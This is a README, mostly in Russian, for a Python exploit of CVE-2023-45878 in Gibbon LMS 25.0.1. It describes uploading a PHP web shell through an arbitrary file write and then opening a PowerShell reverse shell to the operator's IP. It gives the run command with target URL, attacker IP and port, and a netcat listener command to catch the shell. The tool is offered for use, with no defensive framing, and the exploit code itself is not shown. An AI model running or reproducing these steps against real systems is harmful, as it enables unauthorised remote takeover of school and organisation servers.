
Эксплойт на Python для CVE-2023-45878, нацеленный на Gibbon LMS 25.0.1. Использует произвольную запись файлов для загрузки PHP-веб-шелла и выполнения обратного PowerShell-шелла для удаленного доступа.
Написал этот скрипт на основе работы https://herolab.usd.de/security-advisories/usd-2023-0025/ . Эксплойт работает, используя уязвимость Arbitrary File Write в Gibbon LMS 25.0.1 . Этот PoC загружает простой php-скрипт для команд, а затем использует его для загрузки powershell revshell.
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
Флаги:
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
Убедитесь, что у вас запущен слушатель для входящей оболочки.
nc -lvnp 8888